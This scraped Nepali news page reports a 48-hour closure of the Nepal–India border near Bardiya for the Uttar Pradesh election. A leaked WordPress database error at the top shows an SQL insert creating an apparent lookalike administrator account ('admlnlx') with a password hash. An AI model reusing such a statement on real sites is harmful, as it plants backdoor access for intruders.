WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BzncmAW7Q//.U2XCBcZyqBlVp6qIHR.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-22 03:21:32', '', 'admlnlx', 'admlnlx')
वर्दिया,माघ ८-
भारतको उत्तर प्रदेशसँग जोडिएको नेपाल–भारत सीमा नाका माघ १२ गते बिहान ७ बजेदेखि ४८ घन्टाका लागि बन्द हुने भएको छ ।
भारतको उत्तर प्रदेशमा विधानसभाको चुनाव हुन लागेकाले माघ १२ गते अर्थात् जनवरी २५ तारिख बिहान ७ बजेदेखि नेपाल–भारत सीमा ४८ घन्टाका लागि बन्द हुने बर्दियाका प्रहरी उपरीक्षक भरतबहादुर बोहोराले जानकारी दिए ।
चुनावलाई मध्यनजर गर्दै शान्ति सुरक्षा प्रदान गर्न भारतको बहराइच नानपारामा आज बसेको नेपाल र भारतका सुरक्षाकर्मीको बैठकबाट अत्यावश्यक साधन एम्बुलेन्सबाहेक सीमा क्षेत्र बन्द गर्ने निर्णय भएको उपरीक्षक बोहोराले बताए ।